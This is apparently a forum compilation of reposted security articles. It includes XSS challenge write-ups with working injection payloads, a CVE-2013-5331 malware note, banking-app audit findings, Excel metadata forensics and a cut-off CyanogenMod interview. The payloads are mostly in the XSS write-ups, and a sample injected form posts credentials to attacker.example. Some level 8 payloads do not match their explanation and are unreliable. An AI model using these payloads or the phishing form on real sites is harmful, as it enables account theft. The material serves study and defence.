This level is based on a real-world filter described by Stefano Di Paola in this post. If we study the regexp carefully we will see that the letter “s” is allowed, since it sits within the “r-u” interval; that lets us use the word “self”, and with that we can craft a valid JSON-looking payload. The trick is that we add “0” to our object, so the JS engine has to compute the valueOf our object.
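The coercion mechanism is easy to check in node. This is only a sketch (alert is replaced by a counter, since there is no alert outside a browser): using an object in arithmetic triggers ToPrimitive, which calls the object’s valueOf, so a function gets invoked without any parentheses at the call site.

```javascript
let i = 0;
const theEasyWay = () => i++; // stand-in for the_easy_but_expensive_way_out

// Adding 0 forces ToPrimitive, which calls valueOf:
const first  = { valueOf: theEasyWay } + 0; // valueOf returns 0
const second = { valueOf: theEasyWay } + 0; // second coercion returns 1

console.log(first, second); // 0 1
```

This mirrors why the challenge payload has to run twice: the first coercion alerts 0, the second alerts 1.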
So if we define the “valueOf” function to be the “the_easy_but_expensive_way_out” global function, it will be invoked during the arithmetic operation. The problem is that the first call alerts “0”, since “i” is initialized to “0”, but we can do it twice to alert a “1”.

Long solution:

{"valueOf":self["the_easy_but_expensive_way_out"]}+0,{"valueOf":self["the_easy_but_expensive_way_out"]}

That is a nice trick for executing a function when parentheses are not allowed. There are some more, like Gareth’s famous one:

onerror=eval;throw['=1;alert\x281\x29']

You can get a shorter, IE-only solution, as explained by Stefano Di Paola in his post:

{"valueOf":self["location"],"toString":[]["join"],0:"javascript:alert(1)","length":1}

And that’s all, folks. Thanks for reading!

Posted by Alvaro Muñoz Jan 8th, 2014

Source: escape.alf.nu XSS Challenges Write-ups (Part 2) - PwnTesting
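To see concretely why the payload slips through, here is the level 16 character filter reproduced as a standalone function (my reproduction; the helper names are mine): string literals are stripped first, then any remaining character outside the JSON-token set causes rejection. Since the class r-u admits “s”, the bare identifier self survives, while parentheses do not.

```javascript
// Reproduction of the level 16 filter: strip quoted strings, then reject
// anything that is not a JSON token character.
const passesFilter = (text) =>
  !/[^,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]/.test(
    text.replace(/"(\\.|[^"\\])*"/g, ''));

const payload =
  '{"valueOf":self["the_easy_but_expensive_way_out"]}+0,' +
  '{"valueOf":self["the_easy_but_expensive_way_out"]}';

console.log(passesFilter(payload));    // true  - accepted
console.log(passesFilter('alert(1)')); // false - '(' is not a JSON token
```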
-
[h=1]escape.alf.nu XSS Challenges Write-ups[/h] These are my solutions to Erling Ellingsen's escape.alf.nu XSS challenges. I found them very interesting and I learnt a lot from them (especially from the last ones, to be published in Part 2). I'm publishing my results since the game has been online for a long time now and there are already some sites with partial results. My suggestion, if you haven't done it so far, is to go and try to solve them by yourselves… so come on, don't be lazy, stop reading here and give them a try … … … … … Ok, so if you have already solved them or need some hints, here are my solutions. [h=1]Level 0:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 5 [/TD] [TD=class: code] function escape(s) { // Warmup. return '<script>console.log("'+s+'");</script>'; } [/TD] [/TR] [/TABLE] There is no encoding, so the easiest solution is to close the "log" call and inject our "alert". Solution: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] ");alert(1," [/TD] [/TR] [/TABLE] [h=1]Level 1:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 5 [/TD] [TD=class: code] function escape(s) { // Escaping scheme courtesy of Adobe Systems, Inc. s = s.replace(/"/g, '\\"'); return '<script>console.log("' + s + '");</script>'; } [/TD] [/TR] [/TABLE] The function escapes double quotes by prefixing them with a backslash. The shortest solution is to inject \" so the escape function turns it into [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] \\\" [/TD] [/TR] [/TABLE] effectively escaping the backslash but not the double quote. Solution: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] \");alert(1)// [/TD] [/TR] [/TABLE] [h=1]Level 2:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 [/TD] [TD=class: code] function escape(s) { s = JSON.stringify(s); return '<script>console.log(' + s + ');</script>'; } [/TD] [/TR] [/TABLE] JSON.stringify() will escape double quotes (") into (\") but it does not escape angle brackets (<>), so we can close the current script block and start a brand new one. 
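This behaviour is easy to confirm in the console; a quick sketch:

```javascript
// JSON.stringify adds surrounding quotes and escapes embedded double quotes,
// but leaves angle brackets untouched -- so the generated <script> block can
// be closed early by the payload itself.
const out = JSON.stringify('</script><script>alert(1)//');
console.log(out); // "</script><script>alert(1)//" (with quotes, < > intact)
```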
Solution: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] </script><script>alert(1)// [/TD] [/TR] [/TABLE] [h=1]Level 3:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 [/TD] [TD=class: code] function escape(s) { var url = 'javascript:console.log(' + JSON.stringify(s) + ')'; console.log(url); var a = document.createElement('a'); a.href = url; document.body.appendChild(a); a.click(); } [/TD] [/TR] [/TABLE] Again (") is escaped, but since we are within a URL context we can use URL encoding: in this case %22 for ("). Solution: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] %22);alert(1)// [/TD] [/TR] [/TABLE] [h=1]Level 4:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 [/TD] [TD=class: code] function escape(s) { var text = s.replace(/</g, '&lt;').replace('"', '&quot;'); // URLs text = text.replace(/(http:\/\/\S+)/g, '<a href="$1">$1</a>'); // [[img123|Description]] text = text.replace(/\[\[(\w+)\|(.+?)\]\]/g, '<img alt="$2" src="$1.gif">'); return text; } [/TD] [/TR] [/TABLE] The following characters are replaced: < → &lt; (all occurrences) " → &quot; (just the first occurrence) The escape function also uses a template like [[src|alt]] that becomes [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] <img alt="alt" src="src.gif"> [/TD] [/TR] [/TABLE] We can use this template with any src and an alt starting with a double quote (") that will be escaped, a second double quote (") that won't be escaped, and then a new event handler like onload="alert(1) that will be closed by the double quote inserted by the template. Solution: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] [[a|""onload="alert(1)]] [/TD] [/TR] [/TABLE] It will be rendered as: [h=1]Level 5:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 11 [/TD] [TD=class: code] function escape(s) { // Level 4 had a typo, thanks Alok. // If your solution for 4 still works here, you can go back and get more points on level 4 now. var text = s.replace(/</g, '&lt;').replace(/"/g, '&quot;'); // URLs text = text.replace(/(http:\/\/\S+)/g, '<a href="$1">$1</a>'); // [[img123|Description]] text = text.replace(/\[\[(\w+)\|(.+?)\]\]/g, '<img alt="$2" src="$1.gif">'); return text; } [/TD] [/TR] [/TABLE] Now we cannot rely on the (") regexp typo, but we can still use the template function to generate an image tag that executes our alert(1) when loaded. We will use any src and a URL that will be replaced by the second replace function. Solution: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] [[a|http://onload='alert(1)']] [/TD] [/TR] [/TABLE] The first replace function won't trigger with this payload. The second replace function will act on the URL, getting: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] [[a|<a href=http://onload='alert(1)]]">http://onload='alert(1)']]</a> [/TD] [/TR] [/TABLE] The third replace function will create our img tag: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] <img alt="<a href="http://onload='alert(1)']]">http://onload='alert(1)'" src="a.gif"> [/TD] [/TR] [/TABLE] It will be rendered as: [h=1]Level 6:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 10 [/TD] [TD=class: code] function escape(s) { // Slightly too lazy to make two input fields. // Pass in something like "TextNode#foo" var m = s.split(/#/); // Only slightly contrived at this point. var a = document.createElement('div'); a.appendChild(document['create'+m[0]].apply(document, m.slice(1))); return a.innerHTML; } [/TD] [/TR] [/TABLE] The trick is to review all the functions in the DOM that begin with "create" and that don't escape characters. The shortest one to use is "createComment". 
For example, Comment#<foo> will create the following code: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] <!--<foo>--> [/TD] [/TR] [/TABLE] From there, it's easy to go to: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] Comment#><svg onload=alert(1) [/TD] [/TR] [/TABLE] That will render: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] <!--><svg onload=alert(1)--> [/TD] [/TR] [/TABLE] [h=1]Level 7:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 5 6 7 8 9 [/TD] [TD=class: code] function escape(s) { // Pass inn "callback#userdata" var thing = s.split(/#/); if (!/^[a-zA-Z\[\]']*$/.test(thing[0])) return 'Invalid callback'; var obj = {'userdata': thing[1] }; var json = JSON.stringify(obj).replace(/</g, '\\u003c'); return "<script>" + thing[0] + "(" + json +")</script>"; } [/TD] [/TR] [/TABLE] We will enclose the opening bracket and the fixed JSON contents in single quotes to transform them into a string, and then we will be able to inject our JS payload. Solution: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] '#';alert(1)// [/TD] [/TR] [/TABLE] It will render: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code] <script>'({"userdata":"';alert(1)//"})</script> [/TD] [/TR] [/TABLE] [h=1]Level 8:[/h] [TABLE] [TR] [TD=class: gutter] 1 2 3 4 [/TD] [TD=class: code] function escape(s) { // Courtesy of Skandiabanken return '<script>console.log("' + s.toUpperCase() + '")</script>'; } [/TD] [/TR] [/TABLE] There is no escaping function, only an uppercase conversion, so we can close the existing <script> tag and create new tags (HTML is case insensitive); the alphabetic characters of the JS payload are written as HTML character references such as &#97;, which survive toUpperCase. These are some valid solutions: [TABLE] [TR] [TD=class: gutter] 1 2 3 [/TD] [TD=class: code] </script><svg><script>alert(1)// (52) </script><svg onload=alert(1)// (51) </script><svg onload=alert(1)// (50) [/TD] [/TR] [/TABLE] I guess people solving the challenge with 28 characters or so did something like: [TABLE] [TR] [TD=class: gutter] 1 [/TD] [TD=class: code]
</script><script src="<very short domain>"> [/TD] [/TR] [/TABLE] Posted by Alvaro Muñoz Jan 6th, 2014 Sursa: escape.alf.nu XSS Challenges Write-ups (Part 1) - PwnTesting
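One footnote on Level 8: the reason the uppercasing is an obstacle at all is that HTML names are case-insensitive while JavaScript identifiers are not. A quick illustration:

```javascript
// HTML tag and attribute names survive uppercasing, JS identifiers do not.
const payload = '</script><svg onload=alert(1)//';
const upper = payload.toUpperCase();

console.log(upper); // "</SCRIPT><SVG ONLOAD=ALERT(1)//"
// <SVG ONLOAD=...> still parses fine as HTML, but ALERT is not a defined
// identifier -- which is why working payloads have to smuggle the JS part
// past toUpperCase (e.g. via HTML character references such as &#97;).
```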
-
[h=3]CVE-2013-5331 evaded AV by using obscure Flash compression ZWS[/h] We recently came across what is likely the CVE-2013-5331 zero day (Adobe Flash in MS Office .doc) file on virustotal.com (Biglietto Visita.doc, MD5: 2192f9b0209b7e7aa6d32a075e53126d, 0 detections on 2013-11-11, 2/49 on 2013-12-23). The filename is Italian for "business card" and could be related to MFA targeting in Italy. This exploit was patched 2013-12-10, and was in the wild for at least a full month. While it appears to be the only CVE-2013-5331 sample on Virustotal we could find, it's also interesting that the Flash exploit payload uses a very unusual ZWS compression (LZMA, as in the Lempel–Ziv–Markov chain algorithm, originally used in 7zip). CWS or Gzip compression is the most commonly used. This compression method, ZWS, combined with embedding within MS Office documents, is very likely to evade most AV products. From our Cryptam Database Related files with similar metadata: 5da6a1d46641044b782d5c169ccb8fbf 2013-06-28 CVE-2012-5054 7/46 2013-07-07 8d70043395a2d0e87096c67e0d68f931 2013-06-28 CVE-2013-0633 6/46 2013-07-18 Posted by DT at 2:42 AM Sursa: malware tracker blog: CVE-2013-5331 evaded AV by using obscure Flash compression ZWS
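For what it's worth, catching this trick in a scanner only takes a look at the first three bytes of the embedded SWF. A sketch using the standard SWF signature values:

```javascript
// Classify a SWF header by its 3-byte magic: FWS = uncompressed,
// CWS = zlib-compressed, ZWS = LZMA-compressed (the rare variant above).
function swfCompression(bytes) {
  const sig = String.fromCharCode(bytes[0], bytes[1], bytes[2]);
  return { FWS: 'uncompressed', CWS: 'zlib', ZWS: 'lzma' }[sig] || 'not a SWF';
}

swfCompression([0x5a, 0x57, 0x53, 0x0d]); // "lzma" (0x5a 0x57 0x53 = "ZWS")
```

A scanner that only looks for the common "FWS"/"CWS" prefixes would miss ZWS samples entirely, which is presumably why this one went undetected for so long.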
-
Personal banking apps leak info through phone By Ariel Sanchez For several years I have been reading about flaws in home banking apps, but I was skeptical. To be honest, when I started this research I was not expecting to find any significant results. The goal was to perform a black box and static analysis of worldwide mobile home banking apps. The research used iPhone/iPad devices to test a total of 40 home banking apps from the top 60 most influential banks in the world. In order to obtain a global view of the state of security, some of the more important banks from the following countries were included in the research: Relevant Points The research was performed in 40 hours (non-consecutive). To protect the owners of the apps and their customers, this research does not disclose the specific vulnerabilities found or how to exploit them. All tests were only performed on the application (client side); the research excluded any server-side testing. Some of the affected banks were contacted and the vulnerabilities reported. Tests The following tests were performed for each application: Transport Security Plaintext Traffic Improper session handling Properly validate SSL certificates [*] Compiler Protection Anti-jailbreak protection Compiled with PIE Compiled with stack cookies Automatic Reference Counting [*] UIWebViews Data validation (input, output) Analyze UIWebView implementations [*] Insecure data storage SQLite database File caching Check property list files Check log files [*] Logging Custom logs NSLog statements Crash report files [*] Binary analysis Disassemble the application Detect obfuscation protections in the assembly code Detect anti-tampering protections Detect anti-debugging protections Protocol handlers Client-side injection Third-party libraries Summary All of the applications could be installed on a jailbroken iOS device. This helped speed up the static and black box analysis. 
Black Box Analysis Results The following tools were used for the black box analysis: otool (object file displaying tool)[1] Burp pro (proxy tool)[2] ssh (Secure Shell) 40% of the audited apps did not validate the authenticity of the SSL certificates presented. This makes them susceptible to Man in The Middle (MiTM) attacks.[3] A few apps (less than 20%) did not have Position Independent Executable (PIE) and Stack Smashing Protection enabled; these protections help to mitigate the risk of memory corruption attacks.
>#otool -hv MobileBank
MobileBank:
Mach header
magic cputype cpusubtype caps filetype ncmds sizeofcmds flags
MH_MAGIC ARM V6 0x00 EXECUTE 24 3288 NOUNDEFS DYLDLINK PREBOUND TWOLEVEL
Many of the apps (90%) contained several non-SSL links throughout the application. This allows an attacker to intercept the traffic and inject arbitrary JavaScript/HTML code in an attempt to create a fake login prompt or similar scam. Moreover, it was found that 50% of the apps are vulnerable to JavaScript injections via insecure UIWebView implementations. In some cases, the native iOS functionality was exposed, allowing actions such as sending SMS or emails from the victim’s device. A new generation of phishing attacks has become very popular in which the victim is prompted to retype his username and password “because the online banking password has expired”. The attacker steals the victim’s credentials and gains full access to the customer’s account. The following example shows a vulnerable UIWebView implementation from one of the home banking apps. It allows a false HTML form to be injected, which an attacker can use to trick the user into entering their username and password and then send their credentials to a malicious site. Another concern brought to my attention while doing the research was that 70% of the apps did not have any alternative authentication solutions, such as multi-factor authentication, which could help to mitigate the risk of impersonation attacks. 
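The fake-login scam described above comes down to injecting markup into any page the app fetches over plain HTTP. A sketch of what such an injection could look like (the domain and field names are invented for illustration):

```javascript
// Markup a man-in-the-middle could append to any non-SSL response rendered
// by a vulnerable UIWebView. The collection URL is hypothetical.
const injectedHtml =
  '<form action="https://attacker.example/collect" method="POST">' +
  '<p>Your online banking password has expired. Please sign in again:</p>' +
  '<input name="username"><input name="password" type="password">' +
  '<input type="submit" value="Sign in"></form>';

// A UIWebView that loads mixed plaintext content renders this form exactly
// like the bank's own UI; on submit, the credentials go to the attacker.
```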
Most of the log files generated by the apps, such as crash reports, exposed sensitive information. This information could be leaked and help attackers to find and develop 0day exploits with the intention of targeting users of the application. Most of the apps disclosed sensitive information through the Apple system log. The following example was extracted from the Console system using an iPhone Configuration Utility (IPCU) tool. The application dumps the user credentials from the authentication process. … CA_DEBUG_TRANSACTIONS=1 in environment to log backtraces. Jun 22 16:20:37 Test Bankapp[2390] <Warning>: <v:Envelope xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:d="http://www.w3.org/2001/XMLSchema" xmlns:c="http://schemas.xmlsoap.org/soap/encoding/" xmlns:v="http://schemas.xmlsoap.org/soap/envelope/"> <v:Header /> <v:Body> <n0:loginWithRole id="o0" c:root="1" xmlns:n0="http://mobile.services.xxxxxxxxx.com/"> <in0 i:type="d:string">USER-ID</in1> <in1 i:type="d:string">XRS</in2> <in2 i:type="d:string">PASSWORD</in3> <in3 i:type="d:string">xxxxxxxx</in4> </n0:loginWithRole> </v:Body> </v:Envelope> Jun 22 16:20:37 Test Bankapp[2390] <Warning>: ]]]]]]]]]]]]] wxxx.xxxxx.com Jun 22 16:20:42 Test Bankapp[2390] <Warning>: RETURNED: Jun 22 16:20:42 Test Bankapp [2390] <Warning>: CoreAnimation: warning, deleted thread with uncommitted CATransaction; set CA_DEBUG_TRANSACTIONS=1 in environment to log backtraces. … Static Analysis Results The following tools were used for the static analysis and decryption: IDA PRO (disassembler tool) [4] Clutch (cracking utility) [5] objc-helper-plugin-ida [6] ssh (Secure Shell) gdb (debugger tool) IPCU [7] The binary code of each app was decrypted using Clutch. A combination of decrypted code and code disassembled with IDA PRO was used to analyze the application. Hardcoded development credentials were found in the code. 
__text:00056350 ADD R0, PC ; selRef_sMobileBankingURLDBTestEnv__ __text:00056352 MOVT.W R2, #0x46 __text:00056356 ADD R2, PC ; "https://mob_user:T3stepwd@db.internal/internal/db/start.do?login=mobileEvn" __text:00056358 LDR R1, [R0] ; "setMobileBankingURLDBTestEnv_iPad_mobil"... __text:0005635A MOV R0, R4 __text:0005635C BLX _objc_msgSend __text:00056360 MOV R0, (selRef_setMobileBankingURLDBTestEnvWithValue_iPad_mobileT_ - 0x56370) ; selRef_setMobileBankingURLDBTestEnvWithValue_iPad_mobileT_ __text:00056368 MOVW R2, #0xFA8A __text:0005636C ADD R0, PC ; selRef_setMobileBankingURLDBTestEnvWithValue_i_mobileT_ __text:0005636E MOVT.W R2, #0x46 __text:00056372 ADD R2, PC ; "https://mob_user:T3stepwd@db.internal/internal/db/start.do?login=mobileEvn&branch=%@&account=%@&subaccount=%@" __text:00056374 LDR R1, [R0] ; "setMobileBankingURLDBTestEnvWith_i"... __text:00056376 MOV R0, R4 __text:00056378 BLX _objc_msgSend By using hardcoded credentials, an attacker could gain access to the development infrastructure of the bank and infest the application with malware causing a massive infection for all of the application’s users. Internal functionality exposed via plaintext connections (HTTP) could allow an attacker with access to the network traffic to intercept or tamper with data. __text:0000C980 ADD R2, PC ; "http://%@/news/?version=%u" __text:0000C982 MOVT.W R3, #9 __text:0000C986 LDR R1, [R1] ; "stringWithFormat:" __text:0000C988 ADD R3, PC ; "Mecreditbank.com" __text:0000C98A STMEA.W SP, {R0,R5} __text:0000C98E MOV R0, R4 __text:0000C990 BLX _objc_msgSend __text:0000C994 MOV R2, R0 ... 
__text:0001AA70 LDR R4, [R2] ; _OBJC_CLASS_$_NSString __text:0001AA72 BLX _objc_msgSend __text:0001AA76 MOV R1, (selRef_stringWithFormat_ - 0x1AA8A) ; selRef_stringWithFormat_ __text:0001AA7E MOV R2, (cfstr_HttpAtmsOpList - 0x1AA8C) ; "http://%@/atms/?locale=%@&version=%u" __text:0001AA86 ADD R1, PC; selRef_stringWithFormat_ __text:0001AA88 ADD R2, PC; "http://%@/atms/version=%u" __text:0001AA8A __text:0001AA8A loc_1AA8A ; CODE XREF: -[branchesViewController processingVersion:]+146j __text:0001AA8A MOVW R3, #0x218C __text:0001AA8E LDR R1, [R1] __text:0001AA90 MOVT.W R3, #8 __text:0001AA94 STMEA.W SP, {R0,R5} __text:0001AA98 ADD R3, PC ; "Mecreditbank.com" __text:0001AA9A MOV R0, R4 __text:0001AA9C BLX _objc_msgSend Moreover, 20% of the apps sent account activation codes through plaintext communication (HTTP). Even if this functionality is limited to initial account setup, the associated risk is high. If an attacker intercepts the traffic, he could hijack a session and steal the victim’s account without any notification or evidence to detect the attack. After taking a close look at the file system of each app, it turned out that some of them used an unencrypted SQLite database to store sensitive information, such as details of the customer’s banking account and transaction history. An attacker could use an exploit to access this data remotely, or, with physical access to the device, could install jailbreak software in order to steal the information from the file system of the victim’s device. The following example shows an SQLite database structure taken from the file system of an app where bank account details were stored without encryption. 
Other minor information leaks were found, including: Internal IP addresses: __data:0008B590 _TakeMeToLocationURL DCD cfstr_Http10_1_4_133 __data:0008B590 ; DATA XREF: -[NavigationView viewDidLoad]+80o __data:0008B590 ; __nl_symbol_ptr:_TakeMeToLocationURL_ptro __data:0008B590 ; "http://100.10.1.13:8080/WebTestProject/PingTest.jsp" Internal file system paths: __cstring:000CC724 aUsersXXXXPro DCB "/Users/Scott/projects/HM_iphone/src/HBMonthView.m",0 Even though disclosing this information on its own doesn't have a significant impact, an attacker who collected a good number of these leaks could gain an understanding of the internal layout of the application and server-side infrastructure. This could enable an attacker to launch specific attacks targeting both the client- and server-side of the application. Conclusions From a defensive perspective, the following recommendations could mitigate the most common flaws: Ensure that all connections are performed using secure transfer protocols Enforce SSL certificate checks by the client application Protect sensitive data stored on the client-side by encrypting it using the iOS data protection API Implement additional checks to detect jailbroken devices Obfuscate the assembly code and use anti-debugging tricks to slow the progress of attackers when they try to reverse engineer the binary Remove all debugging statements and symbols Remove all development information from the production application Home banking apps that have been adapted for mobile devices, such as smart phones and tablets, have created a significant security challenge for worldwide financial firms. As this research shows, the financial industry should increase the security standards it uses for its mobile home banking solutions. 
References: [1]http://developer.apple.com/library/mac/#documentation/Darwin/Reference/ManPages/man1/otool.1.html [2] Burp Suite Editions [3] https://www.owasp.org/index.php/Man-in-the-middle_attack [4] https://www.hex-rays.com/products/ida/ [5] https://www.appaddict.org/forum/index.php?/topic/40-how-to-crack-ios-apps/ [6] https://github.com/zynamics/objc-helper-plugin-ida [7] Apple - Support - Downloads Cesar at 7:00 AM Sursa: IOActive Labs Research: Personal banking apps leak info through phone
-
[h=3]MS Excel 2013 Last Saved Location Metadata[/h] The release of Microsoft Office 2013 granted the ability to save files in formats not previously available (such as "Strict OOXML"), but the default format remained the same as Office 2007 and 2010. Despite the common file format, I've found that Microsoft Excel 2013 spreadsheets maintain additional metadata not available in earlier versions of Excel. Specifically, it appears that the absolute path to the directory in which the spreadsheet was last saved is maintained by Excel 2013 spreadsheets. I have not yet found a tool that presents the last saved location with other metadata from an Excel 2013 spreadsheet, but this information can easily be found by opening the "workbook.xml" file embedded in the parent spreadsheet. Simply changing the file extension from "xlsx" to "zip" and using a zip-extraction utility to extract the contents of the spreadsheet is a quick way to gain access to the embedded files without requiring any specialized tools. Workbook.xml contains information about the Excel file such as worksheet names, window height and width parameters, and a bit of other information. For the most part, this XML file appears to be similar across files created using Excel 2007, 2010, and 2013, however, there is one key difference: the "x15ac:absPath" element. The "x15ac:absPath" element is a child element of "mc:Choice" (which is a child element of "mc:AlternateContent") and contains an attribute called "url" that corresponds to the last saved location of the spreadsheet. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Workbook.xml file from Excel 2013[/TD] [/TR] [/TABLE] Information from the "url" attribute could be helpful in many cases, particularly those in which the previous location of a spreadsheet is significant. 
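Once workbook.xml has been extracted (e.g. via the rename-to-.zip approach above), the attribute is also easy to pull out programmatically. A sketch in JavaScript, with an abbreviated, made-up sample fragment:

```javascript
// Return the url attribute of the x15ac:absPath element, i.e. the directory
// in which the spreadsheet was last saved (null if absent, e.g. for files
// last saved by Excel 2007/2010).
function lastSavedLocation(workbookXml) {
  // A quick regex match; a forensic tool should use a real XML parser.
  const m = workbookXml.match(/<x15ac:absPath\b[^>]*\burl="([^"]*)"/);
  return m ? m[1] : null;
}

// Abbreviated workbook.xml fragment with an invented path:
const sample = '<mc:AlternateContent><mc:Choice Requires="x15">' +
  '<x15ac:absPath url="C:\\Cases\\Exhibit7\\" /></mc:Choice></mc:AlternateContent>';

lastSavedLocation(sample); // "C:\Cases\Exhibit7\"
```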
For example, examining this metadata field in a spreadsheet copied to a USB device could allow the examiner to identify the previous directory in which the spreadsheet was saved (before it was copied to the USB device). It's important to note, however, that resaving a 2013 spreadsheet using Excel 2007 or 2010 appears to remove the "x15ac:absPath" element. If you know that a spreadsheet was created using Excel 2013 but are unable to find the last saved location metadata, it's possible that the spreadsheet was last saved in a version of Excel other than 2013. This can be verified through the "fileVersion" element, which is the first child element of "workbook". The "fileVersion" element includes an attribute called "lastEdited" and, according to Microsoft documentation, the "lastEdited" attribute "specifies the version of the application that last saved the workbook". Interestingly, the value specified in the "lastEdited" attribute is not consistent with the application version of Excel (i.e. 2007=12.x, 2010=14.x, etc.). Instead, this value is a single-digit numeral corresponding to a particular version of Excel. I've run some quick tests using 2007, 2010, and 2013 and summarized the corresponding fileVersion values for each Excel version in the table below. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]fileVersion Value to Excel Version Mapping[/TD] [/TR] [/TABLE] Importantly, Excel 2013 is aware of the last saved location metadata and will clear this information if the user elects to do so using Excel's built-in Document Inspector. Otherwise, this data should travel with the file until it is saved again, at which point this metadata will either be removed or updated (depending on the version of Excel that saved the file). 
[TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Excel 2013 Document Inspector identifies Last Saved Location Metadata[/TD] [/TR] [/TABLE] Posted by Jason Hale at 11:35 PM Sursa: Digital Forensics Stream: MS Excel 2013 Last Saved Location Metadata
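As a companion to the post above, the lastEdited check can be scripted the same way as the absPath one, since it is just another attribute in workbook.xml. A sketch (the sample fragment and its value are made up; the mapping from value to Excel version is the one in the table above and is not reproduced here):

```javascript
// Return the lastEdited attribute of the fileVersion element: a single-digit
// code identifying the Excel version that last saved the workbook.
function lastEditedCode(workbookXml) {
  const m = workbookXml.match(/<fileVersion\b[^>]*\blastEdited="([^"]*)"/);
  return m ? m[1] : null;
}

// Abbreviated fileVersion element with a placeholder value:
const sample = '<workbook><fileVersion appName="xl" lastEdited="6"/></workbook>';
lastEditedCode(sample); // "6"
```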
-
Banking apps: insecure and badly written, say researchers Buggy code, bad security By Richard Chirgwin, 13th January 2014 Security researchers IO Active are warning that many smartphone banking apps are leaky and need to be fixed. Testing 40 iOS-based banking apps from 60 banks around the world, the research summary is pretty nerve-wracking: 40 per cent are vulnerable to man-in-the-middle attacks, because they don't validate the authenticity of SSL certificates presented by the server; 20 per cent lacked “Position Independent Executable (PIE) and Stack Smashing Protection enabled”, which IO Active says is used to help mitigate memory corruption attacks; Half the apps are vulnerable to cross-site-scripting (XSS) attacks; Over 40 per cent leave sensitive information in the system log; and Over 30 per cent use hard-coded credentials of some kind. Most worrying, however, are a couple of 90 per cent statistics: the number of apps that included non-SSL links, and the number that lack jailbreak detection. Even those with detection could still be installed: “All of the applications could be installed on a jailbroken iOS device. This helped speed up the static and black box analysis”, writes IO Active's Ariel Sanchez. By including non-SSL links in the apps, Sanchez says, an attacker could “intercept the traffic and inject arbitrary JavaScript/HTML code in an attempt to create a fake login prompt or similar scam.” “Moreover, it was found that 50% of the apps are vulnerable to JavaScript injections via insecure UIWebView implementations. In some cases, the native iOS functionality was exposed, allowing actions such as sending SMS or emails from the victim’s device,” he continues. This UIWebView implementation allows a false HTML form to be injected. 
Source: IO Active The IO Active post also details a number of other information leaks, including unencrypted data stored in sqlite databases, and information like IP addresses and application paths that could let a determined and skilled attacker draw inferences about the server-side infrastructure the app is talking to. The research only looked at the client side, Sanchez states, and where possible, IO Active notified banks of the vulnerabilities he identified. ® Sursa: Banking apps: insecure and badly written, say researchers • The Register
-
Sneaky Redirect to Exploit Kit Posted on January 12, 2014 by darryl While I was testing a Pinpoint update, I found a sneaky method to redirect unsuspecting users to Neutrino EK. This one was interesting to me so I thought I would document it here. Here’s the website I visited…looks suspicious already: There was a reference to an external Javascript file: The file is obfuscated Javascript, which is a red flag: I found the malicious redirect, or so I thought… Long story short, this led nowhere. Going back to the main page, there is a call to a Flash file at the bottom. Reviewing the ActionScript reveals something interesting. It reads in a PNG file called “gray-bg.png”, extracts every other character, then evals it. The “PNG” file is not a graphic file but a renamed text file. I used Converter to extract one character every two positions and got this: The URL leads to the Neutrino landing page. Sursa: Sneaky Redirect to Exploit Kit | Kahu Security
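The decoding step described above (keep every other character, then eval the result) is trivial to replicate outside of Converter. A sketch with made-up sample data; whether the real sample starts at offset 0 or 1 depends on the file:

```javascript
// Keep every other character of the disguised "PNG", starting at the given
// offset (0 here; some droppers pad with a leading junk byte instead).
function extractAlternate(data, offset = 0) {
  let out = '';
  for (let i = offset; i < data.length; i += 2) out += data[i];
  return out;
}

extractAlternate('hXtXtXpX:X/X/X'); // "http://"
```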
-
CyanogenMod: from bedroom Android hack to million dollar mobile OS Interview Third-party mod is set to hit the big time By Matthew Bolton January 11th CyanogenMod is one of the most popular third-party Android ROMs available, with over 8 million users. It's an operating system that's grown from the modding community into a mainstream alternative to what your current mobile phone offers. Hate Samsung's TouchWiz? Then CyanogenMod offers a more grown-up user interface. Fed up with HTC Sense or the vanilla look of pure Android on your Nexus? Then CM brings a viable alternative but there's a predicament that's been weighing on the minds of its development team. "I think that for every one person that does install CyanogenMod, there's maybe five or six that try but don't finish. I had one of our board members try to install it, and he actually gave up," laughs Koushik Dutta, one of CyanogenMod's lead developers (known to the community as Koush). The problem of getting people to actually use its software isn't something the CyanogenMod team has taken lightly. In fact, it's one of the spurs that has pushed the team into turning its community-based, open-source Android spin-off into a full-on business venture: Cyanogen Inc. With $7 million in funding behind it, the core CM team, including Koush and CyanogenMod's founder Steve Kondik (known as Cyanogen), is now working on turning the enthusiast-friendly ROM into a mainstream hit. And the first challenge is making it easy to install. Jumping hurdles "What we hear from everybody is that, 'Yeah, I share this with my friends and I think it's great, but then I tell them what they have to do to install it and they bail'," says Kondik. "So we've made this installer. We say it's one-click, though in reality it's more like three clicks. But we've been doing 